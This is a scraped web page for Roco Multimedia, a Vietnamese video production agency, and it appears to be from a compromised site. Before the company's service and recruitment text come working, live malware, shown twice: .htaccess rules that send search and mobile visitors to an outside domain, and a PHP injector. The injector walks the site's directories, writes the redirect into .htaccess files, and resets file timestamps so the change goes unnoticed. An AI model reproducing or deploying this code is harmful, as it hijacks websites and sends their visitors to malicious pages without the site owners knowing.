.*lycos.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://portal-d.pw/XcTyTp [R,L] RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://portal-d.pw/XcTyTp [L,R=302] CODE; $str=array(0,'WORDPRESS'); //API $wp = array('wp-admin','wp-content','wp-includes'); $jm = array('administrator','cache','components','images','includes','language','libraries','logs','modules','plugins','templates','tmp','xmlrpc'); $exc = array_merge($wp,$jm); //Vars $dir = path_finder(); $what = array('.htaccess'); $signature = array('index.php','index.html','index.htm'.'index.phtml','index.shtml'); #Function Path_Finder function path_finder(){ $p=$_SERVER['SCRIPT_FILENAME']; if(empty($p)){ exit(''); } else{ $p=str_replace('\/', '/', $p); $p=trim($p, '/'); $p=substr_count($p, '/')-1; } for($k=1; $k<=$p; $k++){ if(!is_readable(str_repeat('../', $k))){ $pth=trim(str_repeat('../', $k-1)); break; } } if($pth){ return $pth; } else{ return trim(str_repeat('../', $p-1)); } } #Function Edit function edit($path,$content,$str){ $lastmod=filemtime($path); $strnum=file($path); if(!stristr($strnum[$str[0]],$str[1])){ if(file_put_contents($path,$content."\n".file_get_contents($path))){ echo ''; } else{ echo ''; } //Touch touch($path,$lastmod); } else{ echo ''; } } #Function Smartscan function smartscan($dir){ if(function_exists("scandir")){ return scandir($dir); } else{ $dh = opendir($dir); while(false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function search($dir,$content,$str,$what,$signature,$exc){ $d=array(); $d1=array(); $d2=array(); $res=smartscan($dir); if(count(array_intersect($res,$signature)) > 0 && !in_array($what[0],$res)){ if(file_put_contents($dir.'/'.$what[0],$content)){ chmod($dir.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } //add dirs to massive 1 foreach($res as $v){ if(is_dir($dir.'/'.$v) && $v!=="." && $v!==".."){ $d[]=$dir.'/'.$v; } } //scan 1-deep files foreach($d as $n){ $res2=smartscan($n); $compare = explode('/',$n); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n.'/'.$what,$content)){ chmod($n.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l){ if(is_dir($n.'/'.$l) && $l!=='.' && $l!=='..'){ //add dirs to massive 2 $d1[]=$n.'/'.$l; } if(preg_match('#'.implode('|',$what).'#i',$l)){ chmod($n.'/'.$l, 0666); if(is_writable($n.'/'.$l)){ edit($n.'/'.$l,$content,$str); chmod($n.'/'.$l, 0644); }else{ echo ''; } } } } //scan 2-deep files foreach($d1 as $n1){ $res2=smartscan($n1); $compare = explode('/',$n1); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n1.'/'.$what[0],$content) ){ chmod($n1.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l1){ if(is_dir($n1.'/'.$l1) && $l1!=='.' && $l1!=='..'){ //add dirs to massive 3 $d2[]=$n1.'/'.$l1; } if(preg_match('#'.implode('|',$what).'#i',$l1)){ chmod($n1.'/'.$l1, 0666); if(is_writable($n1.'/'.$l1)){ edit($n1.'/'.$l1,$content,$str); chmod($n1.'/'.$l1, 0644); }else{ echo ''; } } } } //scan 3-deep files foreach($d2 as $n2){ $res3=smartscan($n2); $compare = explode('/',$n2); $compare = $compare[count($compare)-1]; if(count(array_intersect($res3,$signature)) > 0 && !in_array($what[0],$res3) && !in_array($compare,$exc)){ if(file_put_contents($n2.'/'.$what[0],$content) ){ chmod($n2.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res3 as $l2){ if(preg_match('#'.implode('|',$what).'#i',$l2)){ chmod($n2.'/'.$l2, 0666); if(is_writable($n2.'/'.$l2)){ edit($n2.'/'.$l2,$content,$str); chmod($n2.'/'.$l2, 0644); }else{ echo ''; } } } } } #Exec Script search($dir,$content,$str,$what,$signature,$exc); $content=<< #RewriteEngine On #RewriteBase / #RewriteCond %{REQUEST_FILENAME} !-f #RewriteCond %{REQUEST_FILENAME} !-d #RewriteRule . /index.php [L] # # END WordPress RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://portal-d.pw/XcTyTp [R,L] RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://portal-d.pw/XcTyTp [L,R=302] CODE; $str=array(0,'WORDPRESS'); //API $wp = array('wp-admin','wp-content','wp-includes'); $jm = array('administrator','cache','components','images','includes','language','libraries','logs','modules','plugins','templates','tmp','xmlrpc'); $exc = array_merge($wp,$jm); //Vars $dir = path_finder(); $what = array('.htaccess'); $signature = array('index.php','index.html','index.htm'.'index.phtml','index.shtml'); #Function Path_Finder function path_finder(){ $p=$_SERVER['SCRIPT_FILENAME']; if(empty($p)){ exit(''); } else{ $p=str_replace('\/', '/', $p); $p=trim($p, '/'); $p=substr_count($p, '/')-1; } for($k=1; $k<=$p; $k++){ if(!is_readable(str_repeat('../', $k))){ $pth=trim(str_repeat('../', $k-1)); break; } } if($pth){ return $pth; } else{ return trim(str_repeat('../', $p-1)); } } #Function Edit function edit($path,$content,$str){ $lastmod=filemtime($path); $strnum=file($path); if(!stristr($strnum[$str[0]],$str[1])){ if(file_put_contents($path,$content."\n".file_get_contents($path))){ echo ''; } else{ echo ''; } //Touch touch($path,$lastmod); } else{ echo ''; } } #Function Smartscan function smartscan($dir){ if(function_exists("scandir")){ return scandir($dir); } else{ $dh = opendir($dir); while(false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function search($dir,$content,$str,$what,$signature,$exc){ $d=array(); $d1=array(); $d2=array(); $res=smartscan($dir); if(count(array_intersect($res,$signature)) > 0 && !in_array($what[0],$res)){ if(file_put_contents($dir.'/'.$what[0],$content)){ chmod($dir.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } //add dirs to massive 1 foreach($res as $v){ if(is_dir($dir.'/'.$v) && $v!=="." && $v!==".."){ $d[]=$dir.'/'.$v; } } //scan 1-deep files foreach($d as $n){ $res2=smartscan($n); $compare = explode('/',$n); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n.'/'.$what,$content)){ chmod($n.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l){ if(is_dir($n.'/'.$l) && $l!=='.' && $l!=='..'){ //add dirs to massive 2 $d1[]=$n.'/'.$l; } if(preg_match('#'.implode('|',$what).'#i',$l)){ chmod($n.'/'.$l, 0666); if(is_writable($n.'/'.$l)){ edit($n.'/'.$l,$content,$str); chmod($n.'/'.$l, 0644); }else{ echo ''; } } } } //scan 2-deep files foreach($d1 as $n1){ $res2=smartscan($n1); $compare = explode('/',$n1); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n1.'/'.$what[0],$content) ){ chmod($n1.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l1){ if(is_dir($n1.'/'.$l1) && $l1!=='.' && $l1!=='..'){ //add dirs to massive 3 $d2[]=$n1.'/'.$l1; } if(preg_match('#'.implode('|',$what).'#i',$l1)){ chmod($n1.'/'.$l1, 0666); if(is_writable($n1.'/'.$l1)){ edit($n1.'/'.$l1,$content,$str); chmod($n1.'/'.$l1, 0644); }else{ echo ''; } } } } //scan 3-deep files foreach($d2 as $n2){ $res3=smartscan($n2); $compare = explode('/',$n2); $compare = $compare[count($compare)-1]; if(count(array_intersect($res3,$signature)) > 0 && !in_array($what[0],$res3) && !in_array($compare,$exc)){ if(file_put_contents($n2.'/'.$what[0],$content) ){ chmod($n2.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res3 as $l2){ if(preg_match('#'.implode('|',$what).'#i',$l2)){ chmod($n2.'/'.$l2, 0666); if(is_writable($n2.'/'.$l2)){ edit($n2.'/'.$l2,$content,$str); chmod($n2.'/'.$l2, 0644); }else{ echo ''; } } } } } #Exec Script search($dir,$content,$str,$what,$signature,$exc);
(+84) 909 750 741
Select Page

ANIMATION & MOTION GRAPHIC

Motion graphics are pieces of digital footage or animation which create the illusion of motion or rotation, and are usually combined with audio for use in multimedia projects. Motion graphics are usually displayed via electronic media technology, but may also be displayed via manual powered technology

INTERACTIVE LED SCREEN VIDEO

Motion graphics are pieces of digital footage or animation which create the illusion of motion or rotation, and are usually combined with audio for use in multimedia projects. Motion graphics are usually displayed via electronic media technology, but may also be displayed via manual powered technology

TRAILER & TEASER EVENTS

Motion graphics are pieces of digital footage or animation which create the illusion of motion or rotation, and are usually combined with audio for use in multimedia projects. Motion graphics are usually displayed via electronic media technology, but may also be displayed via manual powered technology

OUR SERVICE

We work together with you to achieve your marketing and campaign objectives. In Roco Multimedia, teamwork is the key to our success – we work as a dedicated team.

We devise intelligent strategies based on wide-ranging research to help you get from where you are to where you want to be.

Television Commercial

Viral Video

Corporate Video

Sales Brief Video

Safety Factory Video

14670668_599558566901805_6370329136016721696_n

On behalf of Lyns International Co., Ltd (Roco Multimedia), I would like to express my appreciation for the support of all our clients for their trust in us.

With this in mind, Roco Multimedia is proud to have been entrusted with project from: Masan, Unilever, Lafarge Holcim, Pepsi, Honda, Goldent Gate, TP Bank, Brother, Nha Dat,…

Our active, highly skilled and experienced team are always ready to support your business, so let Roco Multimedia be part of the solution you are looking for.

Roco Multimedia is formed by an enthusiastic, knowledgeable and experienced team in media, advertising & production, a place that has gathered talents in their field with the objective to provide our clients with innovation, quality and satisfaction.

Vision and strategy of Roco Multimedia

To provide effective, creative advertising & media solutions to each of individual customer. Work with the heart and passion in driving client’s satisfaction.

Strategic target

To become one of the most trustworthy advertising & media service agency.

Integrity & Honesty

Essential personality traits of Roco Multimedia team member

Trust & Reliability

Fundamental in relationship with our partners (external and internal)

Professionalism

In behavior and attitude
With external and internal partners alike

Development

Our people Our services

BEHIND THE SCENE

WE WANT YOU!

Recruitment (hiring) is a core function of human resource management. Recruitment refers to the overall process of attracting, selecting and appointing suitable candidates for jobs (either permanent or temporary) \within an organization. Recruitment can also refer to processes involved in choosing individuals for unpaid positions, such as voluntary roles or unpaid trainee roles. Managers, human resource generalists and recruitment specialists may be tasked with carrying out recruitment, but in some cases public-sector employment agencies, commercial recruitment agencies, or specialist search consultancies are used to undertake parts of the process. Internet-based technologies to support all aspects of recruitment have become widespread.

Adress: ROCO Office 109/35 Le Quoc Hung. Ward 12. Dist 4. HCMC
Email: tranquan@rocomultimedia.com.vn
